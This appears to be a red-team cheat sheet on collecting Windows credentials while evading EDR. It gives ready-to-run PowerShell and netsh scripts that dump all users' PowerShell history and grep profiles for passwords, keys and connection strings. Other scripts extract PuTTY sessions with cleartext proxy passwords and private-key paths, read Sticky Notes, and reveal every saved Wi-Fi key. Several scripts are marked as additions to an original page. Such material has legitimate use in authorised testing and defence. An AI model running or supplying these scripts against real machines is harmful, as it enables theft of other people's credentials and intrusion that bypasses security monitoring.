Other Targets

LSASS, the SAM hive and Credential Manager are all typically heavily monitored by EDR. If you aren't trying to set off alarms, it is worth exploring some alternative sources of credentials for lateral movement or privilege escalation. None of the sources below require touching LSASS memory or dumping hives.

Command History

PowerShell command history is an excellent source of cleartext credentials and connection strings. PSReadLine appends every interactive command to a per-user file; print the current user's history file location (and read it) with:

gc (Get-PSReadLineOption).HistorySavePath

Here is a one-liner to dump every user's PowerShell history (reading other users' profiles needs local admin; missing files are skipped silently):

foreach($user in ((ls C:\users).fullname)){cat "$user\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt" -ErrorAction SilentlyContinue}

Two caveats: history is only written for interactive sessions where PSReadLine is loaded (not for scripts or remoting), and recent PSReadLine builds skip commands containing words like password, secret or token, so an empty file does not prove nothing sensitive was ever typed.

Files

I typically start by simply looking at what the user directories have to offer. Most user directories will be empty apart from one or two. After that you can quickly narrow things down with a few commands: a shallow listing first, then a targeted recursive search for file types that commonly embed credentials (RDP/VNC connection files, app config files, saved credential blobs).

Get-ChildItem -Depth 2 C:\users\
Get-ChildItem C:\ -Recurse -Include *.rdp, *.config, *.vnc, *.cred -ErrorAction Ignore
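The two sections above (command history and config-style files) both come down to the same job: collect a set of text files and grep them for credential-looking strings. The following is an added example that is not from the original page; the regex patterns and the file-type list are my assumptions about what "interesting" looks like and should be tuned to the target.

```powershell
# Added example, not from the original page. Sweeps every user's PSReadLine history
# and common config/connection files under C:\Users for credential-looking strings.
# The patterns and extensions below are assumptions; extend them for the environment.
$patterns = @(
    'password\s*[=:]',                        # password=..., Password: ...
    '-(Password|Credential|Secret|Token)\b',  # PowerShell parameters with inline values
    'ConvertTo-SecureString',                 # scripts that build credentials inline
    'net use .*/user:',                       # mapped drives with explicit credentials
    'Server=.*;.*(Pwd|Password)=',            # ADO/ODBC connection strings
    'sqlcmd .*-P ',                           # sqlcmd with a cleartext password
    'runas .*/user:',
    'BEGIN (RSA|OPENSSH|EC|DSA)? ?PRIVATE KEY' # private keys pasted into files
)
$regex = ($patterns -join '|')

# 1. PSReadLine history for every profile on the box (other users' need local admin)
$history = Get-ChildItem C:\Users -Directory -ErrorAction SilentlyContinue | ForEach-Object {
    Join-Path $_.FullName 'AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt'
} | Where-Object { Test-Path $_ }

# 2. Config-style files under user profiles. -Depth keeps the sweep fast and quiet;
#    -Include only filters when combined with -Recurse.
$files = Get-ChildItem C:\Users -Recurse -Depth 4 -File `
    -Include *.config,*.xml,*.ini,*.rdp,*.vnc,*.cred,*.txt,*.ps1,*.bat,*.cmd `
    -ErrorAction SilentlyContinue | Select-Object -ExpandProperty FullName

$targets = @($history) + @($files)
if ($targets.Count -eq 0) {
    Write-Warning 'No candidate files found (or no read access to other profiles).'
} else {
    # Select-String is case-insensitive by default, which is what we want here.
    Select-String -Path $targets -Pattern $regex -ErrorAction SilentlyContinue |
        Select-Object Path, LineNumber, @{ n = 'Line'; e = { $_.Line.Trim() } } |
        Format-Table -AutoSize -Wrap
}
```

Expect false positives (documentation, sample configs); the point is to shortlist files for manual review rather than to extract credentials automatically. Widen the root from C:\Users to C:\ only if you are happy with the disk noise a full recursive walk generates.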

Registry / Installed Programs

The registry is most useful as a credential source when paired with knowledge of installed programs. A common target is PuTTY, whose saved sessions live in the user's hive:

reg query HKEY_CURRENT_USER\SOFTWARE\SimonTatham\PuTTY\Sessions

PuTTY does not save SSH passwords, but each session key holds HostName, UserName, PublicKeyFile (despite the name, the path to the .ppk private key) and, if a proxy is configured, ProxyUsername and ProxyPassword in cleartext. The neighbouring SshHostKeys key also lists every host the user has ever accepted a key from, which is a handy map of what they connect to.

Here is a PowerShell snippet to cleanly list installed programs, combining the 64-bit and 32-bit (Wow6432Node) uninstall keys. Per-user installs live under the equivalent HKCU path, which this snippet does not cover.

$INSTALLED = Get-ItemProperty HKLM:\Software\Microsoft\Windows\CurrentVersion\Uninstall\* |  Select-Object DisplayName, DisplayVersion, InstallLocation
$INSTALLED += Get-ItemProperty HKLM:\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\* | Select-Object DisplayName, DisplayVersion, InstallLocation
$INSTALLED | ?{ $_.DisplayName -ne $null } | sort-object -Property DisplayName -Unique | Format-Table -AutoSize
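The PuTTY query above only shows key names; what you actually want are the values inside each session, and ideally for every loaded user hive rather than just your own. The following is an added example (not from the original page) that pulls the useful fields out of each saved session under HKCU and under every loaded profile hive in HKEY_USERS. The value names are PuTTY's own; the SID filter and the decision to fall back to HKCU are my assumptions.

```powershell
# Added example, not from the original page. Enumerates PuTTY saved sessions for the
# current user and for every user hive currently loaded under HKEY_USERS (only logged-on
# users' hives are loaded; reading other SIDs needs local admin).
if (-not (Get-PSDrive HKU -ErrorAction SilentlyContinue)) {
    New-PSDrive -Name HKU -PSProvider Registry -Root HKEY_USERS | Out-Null
}

# Domain/local user SIDs look like S-1-5-21-...; skip the *_Classes hives.
$roots = @('HKCU:\Software\SimonTatham\PuTTY\Sessions')
$roots += Get-ChildItem HKU:\ -ErrorAction SilentlyContinue |
    Where-Object { $_.PSChildName -match '^S-1-5-21-' -and $_.PSChildName -notlike '*_Classes' } |
    ForEach-Object { "HKU:\$($_.PSChildName)\Software\SimonTatham\PuTTY\Sessions" }

$roots | Where-Object { Test-Path $_ } | ForEach-Object {
    $root = $_
    Get-ChildItem $root | ForEach-Object {
        $s = Get-ItemProperty $_.PSPath
        [pscustomobject]@{
            Hive          = ($root -split '\\')[1]          # HKCU or the SID
            # PuTTY percent-encodes session names in the registry (e.g. %20 for a space)
            Session       = [uri]::UnescapeDataString($_.PSChildName)
            Protocol      = $s.Protocol
            HostName      = $s.HostName
            Port          = $s.PortNumber
            UserName      = $s.UserName
            PrivateKey    = $s.PublicKeyFile   # path to the .ppk private key, not a public key
            ProxyHost     = $s.ProxyHost
            ProxyUser     = $s.ProxyUsername
            ProxyPassword = $s.ProxyPassword   # stored in cleartext when set
        }
    }
} | Format-Table -AutoSize
```

If a PrivateKey path turns up, grab the .ppk: an unencrypted one gives you the SSH key directly, and an encrypted one can be cracked offline. The same idea applies to any other client that stores sessions in the registry; the installed-program listing above tells you which ones to go looking for.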

Sticky Notes

Sticky Notes are underrated. Since Windows 10 1607 they are stored as a cleartext SQLite database; the note bodies are in the Text column of the Note table, so strings or any SQLite client will do. The app holds the file open while running, so copy it out before reading it.

C:\Users\<user>\AppData\Local\Packages\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\LocalState\plum.sqlite

On older builds the legacy app stored notes in %AppData%\Microsoft\Sticky Notes\StickyNotes.snt, also in cleartext.

Wi-Fi Passwords

I wouldn't say this has ever helped me, but it's a nice one to have. The first command lists saved profiles; the second reveals the pre-shared key for one of them.

netsh wlan show profile
netsh wlan show profile [profilename] key=clear
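Running the second command once per SSID by hand gets old quickly. The following is an added example (not from the original page) that parses the profile list and dumps SSID, authentication type and key for every saved profile in one table. It assumes English-language netsh output; the field labels differ on localized Windows builds.

```powershell
# Added example, not from the original page. Dumps every saved Wi-Fi profile with its key.
# Assumes English netsh labels ("Profile", "Authentication", "Key Content").
function Get-NetshField {
    param([string[]]$Lines, [string]$Label)
    $m = $Lines | Select-String "$Label\s*:\s*(.+)$" | Select-Object -First 1
    if ($m) { $m.Matches[0].Groups[1].Value.Trim() } else { $null }
}

# "All User Profile     : SSID" lines from the profile listing
$profiles = netsh wlan show profiles |
    Select-String 'Profile\s*:\s*(.+)$' |
    ForEach-Object { $_.Matches[0].Groups[1].Value.Trim() }

$profiles | ForEach-Object {
    $out = netsh wlan show profile name="$_" key=clear
    [pscustomobject]@{
        SSID           = $_
        Authentication = Get-NetshField $out 'Authentication'
        Key            = Get-NetshField $out 'Key Content'   # empty for open / 802.1X networks
    }
} | Format-Table -AutoSize
```

A Key that comes back empty on a WPA2-Personal network usually means the profile is a per-user one you cannot read from this context, or netsh withheld the key; try again from an elevated prompt before assuming there is none.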
